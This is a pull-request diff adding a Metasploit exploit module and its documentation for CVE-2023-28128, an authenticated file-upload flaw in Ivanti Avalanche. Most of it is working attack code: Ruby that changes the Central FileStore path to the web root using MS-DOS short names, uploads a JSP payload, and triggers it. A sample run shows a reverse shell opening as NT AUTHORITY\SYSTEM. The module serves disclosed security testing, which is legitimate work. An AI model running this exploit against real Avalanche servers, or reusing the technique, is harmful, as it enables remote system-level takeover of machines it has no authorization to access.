### PR TITLE
Add exploit for Ivanti Avalanche file upload - CVE-2023-28128

### DIFF
--- a/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
+++ b/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-For vulnerable versions of Ivanti Avalanche, an authenticated administrator
+For versions of Ivanti Avalanche below `v6.4.0.186`, an authenticated administrator
 can change the default path for the Central FileStore. While the default path
 is set to `C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files`,
 Ivanti Avalanche restricts the path from being set to folders within the `Windows` and
@@ -11,7 +11,7 @@ upload a JSP web shell and gain RCE as `NT AUTHORITY\SYSTEM`.
 
 ### Installation Instructions
 
-The software requires a version MSSQL server to be installed. The installation
+The software requires a version of MSSQL server to be installed. The installation
 instructions use MSSQL Server 2012, but 2017 worked for my setup. Ensure that
 `SQL Server and Windows Authentication Mode` are selected as the default for
 server authentication. That can either be done at installation or via

--- a/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
+++ b/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
@@ -1,0 +1,124 @@
+## Vulnerable Application
+
+For vulnerable versions of Ivanti Avalanche, an authenticated administrator
+can change the default path for the Central FileStore. While the default path
+is set to `C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files`,
+Ivanti Avalanche restricts the path from being set to folders within the `Windows` and
+`Program Files` directories. These restrictions do not account for MS-DOS (8.3) path
+names, so this naming convention can be used to set the Central FileStore path to
+the web root of the application. This module leverages the vulnerability to
+upload a JSP web shell and gain RCE as `NT AUTHORITY\SYSTEM`.
+
+### Installation Instructions
+
+The software requires a version MSSQL server to be installed. The installation
+instructions use MSSQL Server 2012, but 2017 worked for my setup. Ensure that
+`SQL Server and Windows Authentication Mode` are selected as the default for
+server authentication. That can either be done at installation or via
+SQL Server Management Studio.
+
+1. Open SQL Server Management Studio and connect to the instance
+2. Right click on the instance and select `Properties`
+3. Click the `Security` page
+4. Underneath `Server Authentication`, select `SQL Server and Windows Authentication Mode` and `Ok`
+
+Instructions for installing Ivanti Avalanche can be found [here](https://forums.ivanti.com/s/article/Best-Known-Method-for-installing-Avalanche-6-x-using-MSSQL-Server-2008-R2-Express-DB-or-2012-Express-Advanced?language=en_US)
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/http/ivanti_avalanche_filestoreconfig_upload`
+4. Do: `set USERNAME <uname>`
+5. Do: `set PASSWORD <pass>`
+6. Do: `set RHOST <ip>`
+7. Do: `run`
+8. You should get a shell as NT AUTHORITY\SYSTEM.
+
+## Options
+
+### USERNAME
+
+An admin user with which to log into the software
+
+### PASSWORD
+
+Password belonging to admin user
+
+## Scenarios
+
+### Ivanti Avalanche v6.3.4.153 - Windows 10 x64
+
+```
+msf6 > use exploit/windows/http/ivanti_avalanche_filestoreconfig_upload
+[*] No payload configured, defaulting to generic/shell_reverse_tcp
+msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > set rhost 192.168.140.150
+rhost => 192.168.140.150
+msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > options
+
+Module options (exploit/windows/http/ivanti_avalanche_filestoreconfig_upload):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   admin            yes       Password to log in with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.140.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
+                                         /using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /AvalancheWeb    yes       The URI of the Example Application
+   USERNAME   amcadmin         yes       User name to log in with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.140.1    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Original FileStore config path: 'C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files'
+[*] Changing FileStore config path to 'C:\PROGRA~1\Wavelink\AVALAN~1\Web'
+[+] Successfully uploaded 'LWRrxDXWxhbz.jsp'
+[*] Attempting to restore config path
+[!] Tried to delete webapps/LWRrxDXWxhbz.jsp, unknown result
+[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.150:50249) at 2023-05-08 14:27:58 -0500
+[!] Failed to restore the FileStore config path to its original path. Please manually restore it.
+[+] Successfully restored the FileStore config path
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19041.630]
+-----
+
+
+C:\Program Files\Wavelink\Avalanche\Web>
+C:\Program Files\Wavelink\Avalanche\Web>
+C:\Program Files\Wavelink\Avalanche\Web>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Wavelink\Avalanche\Web>^C
+Abort session 1? [y/N]  y
+
+[*] 192.168.140.150 - Command shell session 1 closed.  Reason: User exit
+```

--- a/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
+++ b/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
@@ -6,15 +6,15 @@ is set to `C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore
 Ivanti Avalanche restricts the path from being set to folders within the `Windows` and
 `Program Files` directories. These restrictions do not account for MS-DOS (8.3) path
 names, so this naming convention can be used to set the Central FileStore path to
-the web root of the application. This module leverages the vulnerability to
+the web root of the application. This module leverages this vulnerability to
 upload a JSP web shell and gain RCE as `NT AUTHORITY\SYSTEM`.
 
 ### Installation Instructions
 
 The software requires a version of MSSQL server to be installed. The installation
 instructions use MSSQL Server 2012, but 2017 worked for my setup. Ensure that
-`SQL Server and Windows Authentication Mode` are selected as the default for
-server authentication. That can either be done at installation or via
+`SQL Server and Windows Authentication Mode` is selected as the default for
+server authentication. This can either be done at installation or via
 SQL Server Management Studio.
 
 1. Open SQL Server Management Studio and connect to the instance
@@ -33,7 +33,7 @@ Instructions for installing Ivanti Avalanche can be found [here](https://forums.
 5. Do: `set PASSWORD <pass>`
 6. Do: `set RHOST <ip>`
 7. Do: `run`
-8. You should get a shell as NT AUTHORITY\SYSTEM.
+8. You should get a shell as `NT AUTHORITY\SYSTEM`.
 
 ## Options
 

--- a/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
+++ b/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
@@ -14,14 +14,23 @@ The software requires a version of MSSQL Server to be installed. The installatio
 instructions use MSSQL Server 2012, but 2017 worked for my setup. Ensure that
 `SQL Server and Windows Authentication Mode` is selected as the default for
 server authentication. This can either be done at installation or via
-SQL Server Management Studio.
+SQL Server Management Studio, available from https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms.
 
 1. Open SQL Server Management Studio and connect to the instance
 2. Right click on the instance and select `Properties`
 3. Click the `Security` page
-4. Underneath `Server Authentication`, select `SQL Server and Windows Authentication Mode` and `Ok`
+4. Underneath `Server Authentication`, select `SQL Server and Windows Authentication Mode` and `Ok`.
+5. Open SQL Server Configuration Manager -> SQL Server Network Configuration -> Protocols for MSSQLSERVER -> TCP/IP -> Change from Disable to Enabled.
+6. SQL Server Configuration Manager -> SQL Server Services -> Stop all Services -> Start just the SQL Server (MSSQLSERVER) service.
+7. Go back to SQL Server Management Studio.
+8. Security -> Logins -> sa -> Right click -> Select Properties -> Status -> Toggle Login to Enabled -> Ok
+9. Execute the following SQL statement in SQL Server Management Studio: `ALTER LOGIN sa WITH PASSWORD = 'theSAUser123';`
+10. You should now be able to run the installer and set the hostname to `127.0.0.1`, set the username to `sa`, and the password to `theSAUser123`.
+11. Hitting the next button and accept the rest of the defaults.
+12. When it comes to setting up the TomCat connectors, be sure to enable the HTTP and HTTPS services and adjust the ports if there are any port conflicts.
+13. You should now have a complete install available.
 
-Instructions for installing Ivanti Avalanche can be found [here](https://forums.ivanti.com/s/article/Best-Known-Method-for-installing-Avalanche-6-x-using-MSSQL-Server-2008-R2-Express-DB-or-2012-Express-Advanced?language=en_US)
+In case the above doesn't work, instructions for installing Ivanti Avalanche can be found [here](https://forums.ivanti.com/s/article/Best-Known-Method-for-installing-Avalanche-6-x-using-MSSQL-Server-2008-R2-Express-DB-or-2012-Express-Advanced?language=en_US)
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
+++ b/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
@@ -5,13 +5,12 @@ can change the default path for the Central FileStore via the Configuration Sett
 While the default path is set to `C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files`,
 Ivanti Avalanche restricts the path from being set to folders within the `Windows` and
 `Program Files` directories. These restrictions do not account for MS-DOS (8.3) path
-names, so this naming convention can be used to set the Central FileStore path to
-the web root of the application. This module leverages this vulnerability to
-upload a JSP web shell and gain RCE as `NT AUTHORITY\SYSTEM`.
+names, which can be used to set the Central FileStore path to the web root of the application.
+This module leverages this vulnerability to upload a JSP web shell and gain RCE as `NT AUTHORITY\SYSTEM`.
 
 ### Installation Instructions
 
-The software requires a version of MSSQL server to be installed. The installation
+The software requires a version of MSSQL Server to be installed. The installation
 instructions use MSSQL Server 2012, but 2017 worked for my setup. Ensure that
 `SQL Server and Windows Authentication Mode` is selected as the default for
 server authentication. This can either be done at installation or via
@@ -110,14 +109,9 @@ Microsoft Windows [Version 10.0.19041.630]
 -----
 
 
-C:\Program Files\Wavelink\Avalanche\Web>
-C:\Program Files\Wavelink\Avalanche\Web>
 C:\Program Files\Wavelink\Avalanche\Web>whoami
 whoami
 nt authority\system
 
-C:\Program Files\Wavelink\Avalanche\Web>^C
-Abort session 1? [y/N]  y
-
-[*] 192.168.140.150 - Command shell session 1 closed.  Reason: User exit
+C:\Program Files\Wavelink\Avalanche\Web>
 ```

--- a/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
+++ b/documentation/modules/exploit/windows/http/ivanti_avalanche_filestoreconfig_upload.md
@@ -1,8 +1,8 @@
 ## Vulnerable Application
 
 For versions of Ivanti Avalanche below `v6.4.0.186`, an authenticated administrator
-can change the default path for the Central FileStore. While the default path
-is set to `C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files`,
+can change the default path for the Central FileStore via the Configuration Settings pane.
+While the default path is set to `C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files`,
 Ivanti Avalanche restricts the path from being set to folders within the `Windows` and
 `Program Files` directories. These restrictions do not account for MS-DOS (8.3) path
 names, so this naming convention can be used to set the Central FileStore path to
@@ -102,8 +102,7 @@ msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > run
 [*] Attempting to restore config path
 [!] Tried to delete webapps/LWRrxDXWxhbz.jsp, unknown result
 [*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.150:50249) at 2023-05-08 14:27:58 -0500
-[!] Failed to restore the FileStore config path to its original path. Please manually restore it.
-[+] Successfully restored the FileStore config path
+[!] Failed to restore the FileStore config path to its original path. Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.
 
 
 Shell Banner:

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Ivanti Avalanche FileStoreConfig File Upload',
         'Description' => %q{
-          Vulnerable versions of Ivanti Avalanche permit MS-DOS style short
+          Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short
           names in the configuration path for the Central FileStore. Because of
           this, an administrator can change the default path to the web root
           of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM.
@@ -27,8 +27,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'Shelby Pace' # Metasploit module
         ],
         'References' => [
-          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],
-          [ 'CVE', '2023-28128']
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],
+          ['URL', 'https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US'],
+          ['CVE', '2023-28128']
         ],
         'Platform' => ['win'],
         'Privileged' => true,
@@ -36,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [
           [ 'Automatic Target', {}]
         ],
-        'DisclosureDate' => '2022-07-07',
+        'DisclosureDate' => '2023-04-24',
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     )
 
-    unless res && res.body.include?('FileStore')
+    unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first
       fail_with(Failure::UnexpectedReply, 'Failed to access FileStore configuration')
     end
 
@@ -176,7 +176,12 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path') unless res&.body&.include?(new_config_path)
+    input_field_html = res&.get_html_document&.xpath('//input[@id="txtUncPath"]')&.first
+    if input_field_html.blank?
+      fail_with(Failure::UnexpectedReply, 'Did not receive a response containing the expected txtUncPath input field!')
+    elsif input_field_html[:value] != new_config_path
+      fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path')
+    end
   end
 
   def get_directory_val(res, dir_name)
@@ -236,7 +241,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     )
 
-    fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.body&.include?('FileStore')
+    fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first
     web_data_rk = get_directory_val(res, 'webapps')
     view_state = get_view_state(res.get_html_document)
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after accessing the updated FileStore page') unless view_state

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
 
@@ -15,6 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Ivanti Avalanche FileStoreConfig File Upload',
         'Description' => %q{
+          Vulnerable versions of Ivanti Avalanche permit MS-DOS style short
+          names in the configuration path for the Central FileStore. Because of
+          this, an administrator can change the default path to the web root
+          of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -26,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2023-28128']
         ],
         'Platform' => ['win'],
-        'Privileged' => false,
+        'Privileged' => true,
         'Arch' => ARCH_JAVA,
         'Targets' => [
           [ 'Automatic Target', {}]
@@ -34,8 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2022-07-07',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Stability' => [],
-          'Reliability' => [],
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
           'SideEffects' => [ IOC_IN_LOGS ]
         }
       )
@@ -59,11 +64,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Failed to receive a response from the application') unless res
 
-    unless res.body.include?('Avalanche') && res.body.include?('Login')
+    unless res.body.include?('Avalanche')
       return CheckCode::Safe('Application does not appear to be Ivanti Avalanche')
     end
 
-    CheckCode::Safe
+    html = res.get_html_document
+    elem = html.search('link')&.find { |link| link&.at('@href')&.text&.match(/\d+\.\d+\.\d+\.\d{1,4}/) }
+    return CheckCode::Detected('Couldn\'t retrieve element containing Avalanche version') unless elem
+
+    version = elem&.at('@href')&.value&.match(/(\d+\.\d+\.\d+\.\d{1,4})/)
+    return CheckCode::Detected('Failed to retrieve software version') unless version && version.length >= 2
+
+    version = version[1]
+    vprint_status("Version of Ivanti Avalanche appears to be v#{version}")
+    ver_no = Rex::Version.new(version)
+    return CheckCode::Appears if ver_no < Rex::Version.new('6.4.0.186')
+
+    CheckCode::Detected
   end
 
   def authenticate
@@ -126,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text
     fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path
-    print_status("Original FileStore config path: #{@original_config_path}")
+    print_status("Original FileStore config path: '#{@original_config_path}'")
 
     # determine drive letter
     drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)
@@ -157,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
     results = html.xpath('//tr[contains(@class, "DIRECTORY")]')
     fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results
 
-    expand_dir = results.find { |res| res.at('td').text.strip == dir_name }
+    expand_dir = results.find { |result| result.at('td').text.strip == dir_name }
     fail_with(Failure::UnexpectedReply, "Failed to find the '#{dir_name}' directory to write to") unless expand_dir
     data_rk = expand_dir.at('@data-rk')&.value
     fail_with(Failure::UnexpectedReply, 'Failed to get value to expand \'webapps\' directory') unless data_rk
@@ -171,7 +188,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'keep_cookies' => true,
       'vars_post' => {
-        'javax.faces.partial.ajax' => true,
         'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',
         'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',
         'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',
@@ -188,7 +204,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true,
       'vars_post' =>
       {
-        'javax.faces.partial.ajax' => true,
         'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',
         'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',
         'javax.faces.behavior.event' => 'select',
@@ -202,6 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def upload_payload(_config_path)
+    payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
     # need to 'select' webapps/AvalancheWeb to upload a file
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
@@ -226,7 +242,6 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
 
     boundary = "#{'-' * 4}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"
-    puts "AvalancheWeb data_rk #{avalanche_data_rk}"
 
     post_data = "--#{boundary}\r\n"
     post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"
@@ -247,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.render\"\r\n\r\n"
     post_data << "fileStoreTree_dlgFileStoreTree managementBtns addFolderDialog_dlgFileStoreTree renameItemDialog_dlgFileStoreTree confirmDeleteItemDialog_dlgFileStoreTree importMessages\r\n"
     post_data << "--#{boundary}\r\n"
-    post_data << "Content-Disposition: form-data; name=\"importFileStoreItemPanel_dlgFileStoreTree\"; filename=\"blah.jsp\"\r\n"
+    post_data << "Content-Disposition: form-data; name=\"importFileStoreItemPanel_dlgFileStoreTree\"; filename=\"#{payload_name}\"\r\n"
     post_data << "Content-Type: application/octet-stream\r\n\r\n"
     post_data << "#{payload.encoded}\r\n"
     post_data << "--#{boundary}--\r\n"
@@ -265,15 +280,61 @@ class MetasploitModule < Msf::Exploit::Remote
         'Accept-Encoding' => 'gzip, deflate'
       }
     )
-    require 'pry'
-    binding.pry
+
+    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res&.body&.include?("Imported file #{payload_name}")
+
+    print_good("Successfully uploaded '#{payload_name}'")
+    payload_name
   end
 
-  def reset_filestore_dir; end
+  def reset_filestore_dir
+    print_status('Attempting to restore config path')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    unless res
+      fail_with(Failure::UnexpectedReply, 'Could not access FileStore config. Please manually restore FileStore config path')
+    end
+
+    html = res.get_html_document
+    view_state = get_view_state(html)
+    fail_with(Failure::UnexpectedReply, 'Failed to get view state. Please manually restore FileStore config path') unless view_state
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',
+        'formFileStoreConfig' => 'formFileStoreConfig',
+        'txtUncPath' => @original_config_path,
+        'txtVelocityFolder' => '',
+        'javax.faces.ViewState' => view_state
+      }
+    )
+
+    unless res&.body&.include?(@original_config_path)
+      print_warning('Failed to restore the FileStore config path to its original path. Please manually restore it.')
+    end
+
+    print_good('Successfully restored the FileStore config path')
+  end
 
   def exploit
     authenticate
     config_path = configure_filestore
-    upload_payload(config_path)
+    payload_name = upload_payload(config_path)
+
+    register_file_for_cleanup("webapps/#{payload_name}")
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, payload_name.gsub('jsp', 'jsf')),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+  ensure
+    reset_filestore_dir
   end
 end

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US'],
           ['CVE', '2023-28128']
         ],
-        'Platform' => ['win'],
+        'Platform' => ['win', 'java'],
         'Privileged' => true,
         'Arch' => ARCH_JAVA,
         'Targets' => [

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -126,6 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text
     fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path
+    print_status("Original FileStore config path: #{@original_config_path}")
 
     # determine drive letter
     drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)
@@ -151,7 +152,57 @@ class MetasploitModule < Msf::Exploit::Remote
     new_config_path
   end
 
+  def get_directory_val(res, dir_name)
+    html = res.get_html_document
+    results = html.xpath('//tr[contains(@class, "DIRECTORY")]')
+    fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results
+
+    expand_dir = results.find { |res| res.at('td').text.strip == dir_name }
+    fail_with(Failure::UnexpectedReply, "Failed to find the '#{dir_name}' directory to write to") unless expand_dir
+    data_rk = expand_dir.at('@data-rk')&.value
+    fail_with(Failure::UnexpectedReply, 'Failed to get value to expand \'webapps\' directory') unless data_rk
+
+    data_rk
+  end
+
+  def expand_folder(data_rk, view_state)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'javax.faces.partial.ajax' => true,
+        'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',
+        'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',
+        'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',
+        'fileStoreTree_dlgFileStoreTree_expand' => data_rk,
+        'javax.faces.ViewState' => view_state
+      }
+    )
+  end
+
+  def select_folder(data_rk, view_state)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' =>
+      {
+        'javax.faces.partial.ajax' => true,
+        'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',
+        'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',
+        'javax.faces.behavior.event' => 'select',
+        'javax.faces.partial.event' => 'select',
+        'fileStoreTree_dlgFileStoreTree_instantSelection' => data_rk,
+        'form_filestore_tree' => 'form_filestore_tree',
+        'fileStoreTree_dlgFileStoreTree_selection' => data_rk,
+        'javax.faces.ViewState' => view_state
+      }
+    )
+  end
+
   def upload_payload(_config_path)
+    # need to 'select' webapps/AvalancheWeb to upload a file
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
       'method' => 'GET',
@@ -159,34 +210,63 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.body&.include?('FileStore')
-    # need to 'select' webapps/AvalancheWeb to upload a file
-    html = res.get_html_document
-    results = html.xpath('//tr[contains(@class, "DIRECTORY")]')
-    fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results
-    web_app_dir = results.find { |res| res.at('td').text.strip == 'webapps' }
-    fail_with(Failure::UnexpectedReply, 'Failed to find the \'webapps\' directory to write to') unless web_app_dir
-    data_rk = web_app_dir.at('@data-rk')&.value
-    fail_with(Failure::UnexpectedReply, 'Failed to get value to expand \'webapps\' directory') unless data_rk
-    # require 'pry';binding.pry
+    web_data_rk = get_directory_val(res, 'webapps')
+    view_state = get_view_state(res.get_html_document)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
+
+    res = expand_folder(web_data_rk, view_state)
+    fail_with(Failure::UnexpectedReply, 'Did not receive response from \'webapps\' expansion') unless res
+    avalanche_data_rk = get_directory_val(res, 'AvalancheWeb')
+    view_state = get_view_state(res.get_html_document)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
+    res = select_folder(avalanche_data_rk, view_state)
+    fail_with(Failure::UnexpectedReply, 'Did not receive response from \'AvalancheWeb\' selection') unless res
+
+    view_state = get_view_state(res.get_html_document)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
+
+    boundary = "#{'-' * 4}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"
+    puts "AvalancheWeb data_rk #{avalanche_data_rk}"
+
+    post_data = "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"
+    post_data << "upload-form\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n\r\n"
+    post_data << "#{view_state}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.ajax\r\n\r\n"
+    post_data << "true\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.execute\"\r\n\r\n"
+    post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"javax.faces.source\"\r\n\r\n"
+    post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.render\"\r\n\r\n"
+    post_data << "fileStoreTree_dlgFileStoreTree managementBtns addFolderDialog_dlgFileStoreTree renameItemDialog_dlgFileStoreTree confirmDeleteItemDialog_dlgFileStoreTree importMessages\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"importFileStoreItemPanel_dlgFileStoreTree\"; filename=\"blah.jsp\"\r\n"
+    post_data << "Content-Type: application/octet-stream\r\n\r\n"
+    post_data << "#{payload.encoded}\r\n"
+    post_data << "--#{boundary}--\r\n"
 
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
       'method' => 'POST',
       'keep_cookies' => true,
-      'vars_post' => {}
+      'data' => post_data,
+      'headers' => {
+        'Accept' => 'application/xml, text/xml, */*; q=0.01',
+        'Faces-Request' => 'partial/ajax',
+        'X-RequestedWith' => 'XMLHttpRequest',
+        'Content-Type' => "multipart/form-data; boundary=#{boundary}",
+        'Accept-Encoding' => 'gzip, deflate'
+      }
     )
-
